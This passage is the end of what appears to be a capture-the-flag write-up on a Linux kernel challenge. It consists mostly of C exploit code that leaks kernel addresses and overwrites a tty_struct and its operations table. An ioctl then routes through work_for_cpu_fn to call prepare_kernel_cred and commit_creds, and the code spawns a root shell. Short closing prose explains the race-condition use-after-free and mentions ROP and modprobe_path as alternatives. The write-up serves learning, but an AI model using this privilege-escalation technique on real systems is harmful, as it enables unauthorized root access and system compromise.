	printf("[+] ptm_unix98_ops addr leaked, addr: 0x%lx\n", ptm_unix98_ops_addr);
	printf("[+] work_for_cpu_fn addr leaked, addr: 0x%lx\n", work_for_cpu_fn_addr);
	printf("[+] prepare_kernel_cred addr leaked, addr: 0x%lx\n", prepare_kernel_cred_addr);
	printf("[+] tty_struct addr leaked, addr: 0x%lx\n", tty_struct_addr);

	size_t buf_gift[0x100];
	notegift(buf_gift);
	size_t note_0_addr = buf_gift[0 * 2];
	size_t note_1_addr = buf_gift[1 * 2];
	assert(note_0_addr == tty_struct_addr);
	printf("[+] note_1 addr leaked, addr: 0x%lx\n", note_1_addr);

	buf_tty[0] = 0x100005401;
	buf_tty[3] = note_1_addr;
	buf_tty[4] = prepare_kernel_cred_addr;
	buf_tty[5] = 0;
	write(note_fd, buf_tty, 0); // write to tty_struct

	buf_fake_table[7] = work_for_cpu_fn_addr;
	buf_fake_table[10] = work_for_cpu_fn_addr;
	buf_fake_table[12] = work_for_cpu_fn_addr;
	write(note_fd, buf_fake_table, 1);

	// write(tty_fd, buf_a, 1);
	ioctl(tty_fd, 233, 233);

	read(note_fd, buf_tty, 0);
	printf("[+] prepare_kernel_cred finished, return 0x%lx\n", buf_tty[6]);

	buf_tty[0] = 0x100005401;
	buf_tty[3] = note_1_addr;
	buf_tty[4] = commit_creds_addr;
	buf_tty[5] = buf_tty[6];
	write(note_fd, buf_tty, 0);
	sleep(1);

	// write(tty_fd, buf_a, 1);
	ioctl(tty_fd, 233, 233);

	printf("now uid = %d\n", getuid());

	if (getuid() == 0)
	{
		puts("[+] root now!");
		system("/bin/sh");
	}
	else
	{
		exit(-1);
	}

	return 0;
}

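As an aside, here is how I found out that tty_write runs first. In one attempt I zeroed buf_tty in the exp before writing it back to the tty_struct and then called write, to see whether the other members affect the call. That triggered a kernel panic whose message complained about a bad magic number. This seemed odd, since work_for_cpu_fn certainly does not check a magic number, so I looked closely at the error output that flashes by during the panic, saw tty_write in the call trace, read its source, and only then understood my mistake.

To sum up, this challenge is not really hard. The reversing is easy and the idea is clear: a race-condition UAF, followed by a convenient privilege escalation through work_for_cpu_fn. ROP via the tty attack and hijacking modprobe_path are also viable, but I will not reproduce the challenge with them here.

The SLUB allocation mechanism still deserves more study. Honestly, it still confuses me a bit.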